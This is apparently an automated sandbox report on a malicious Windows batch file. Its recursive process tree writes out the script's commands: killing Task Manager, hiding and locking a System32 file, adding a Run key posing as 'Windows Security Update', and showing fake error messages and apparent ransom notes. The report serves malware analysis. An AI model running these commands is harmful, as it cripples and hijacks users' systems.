Analysis
-
max time kernel
30s -
max time network
24s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
28/03/2025, 23:13
General
-
Target
mainversion.bat
-
Size
3KB
-
MD5
97422af7164bd8af68e3ff991ed685a5
-
SHA1
46f9d4c9eb4be48b0579d9b5ce01ef0fed7cf3e4
-
SHA256
3e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf
-
SHA512
72a36da2099eb75da04bd0df431a67d2447eb25179339c6772946d64bc8fe1d4fc9b6fee5c43a18724baf4026c8fc8bd6e280c05d6216944be77892b876ea15e
Score
8/10
Malware Config
Signatures
-
Possible privilege escalation attempt 64 IoCs
-
Sets file to hidden 1 TTPs 26 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 3 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Drops file in System32 directory 7 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 64 IoCs
-
Kills process with taskkill 13 IoCs
-
Opens file in notepad (likely ransom note) 25 IoCs
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 26 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mainversion.bat"1⤵
- Drops startup file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"2⤵
-
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F2⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F2⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"2⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)2⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)2⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f2⤵
- Adds Run key to start application
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F2⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F2⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F2⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F2⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F2⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F2⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F2⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"2⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat4⤵
- Drops startup file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"5⤵
-
-
C:\Windows\system32\net.exenet session5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session6⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F5⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F5⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)5⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)5⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f5⤵
- Adds Run key to start application
-
-
C:\Windows\system32\cmd.execmd.exe5⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"5⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F5⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F5⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F5⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F5⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F5⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F5⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F5⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F5⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"5⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs5⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat7⤵
- Drops startup file
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"8⤵
-
-
C:\Windows\system32\net.exenet session8⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session9⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe8⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F8⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"8⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)8⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)8⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)8⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f8⤵
-
-
C:\Windows\system32\cmd.execmd.exe8⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"8⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F8⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F8⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F8⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F8⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F8⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"8⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"8⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat10⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"11⤵
-
-
C:\Windows\system32\net.exenet session11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session12⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe11⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe11⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe11⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F11⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F11⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"11⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)11⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)11⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f11⤵
-
-
C:\Windows\system32\cmd.execmd.exe11⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"11⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F11⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F11⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F11⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F11⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F11⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F11⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F11⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F11⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F11⤵
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"11⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"11⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat13⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"14⤵
-
-
C:\Windows\system32\net.exenet session14⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session15⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe14⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe14⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe14⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F14⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F14⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"14⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)14⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)14⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)14⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f14⤵
-
-
C:\Windows\system32\cmd.execmd.exe14⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"14⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F14⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F14⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F14⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F14⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F14⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F14⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F14⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F14⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F14⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"14⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"14⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat15⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat16⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"17⤵
-
-
C:\Windows\system32\net.exenet session17⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session18⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe17⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe17⤵
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe17⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F17⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F17⤵
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"17⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)17⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)17⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)17⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f17⤵
-
-
C:\Windows\system32\cmd.execmd.exe17⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"17⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F17⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F17⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F17⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F17⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F17⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F17⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F17⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F17⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F17⤵
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"17⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"17⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat18⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat19⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"20⤵
-
-
C:\Windows\system32\net.exenet session20⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session21⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe20⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe20⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe20⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F20⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F20⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"20⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)20⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)20⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)20⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f20⤵
-
-
C:\Windows\system32\cmd.execmd.exe20⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"20⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F20⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F20⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F20⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F20⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F20⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F20⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F20⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F20⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F20⤵
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"20⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"20⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs20⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat21⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat22⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"23⤵
-
-
C:\Windows\system32\net.exenet session23⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session24⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe23⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe23⤵
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe23⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F23⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F23⤵
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"23⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)23⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)23⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)23⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f23⤵
-
-
C:\Windows\system32\cmd.execmd.exe23⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"23⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F23⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F23⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F23⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
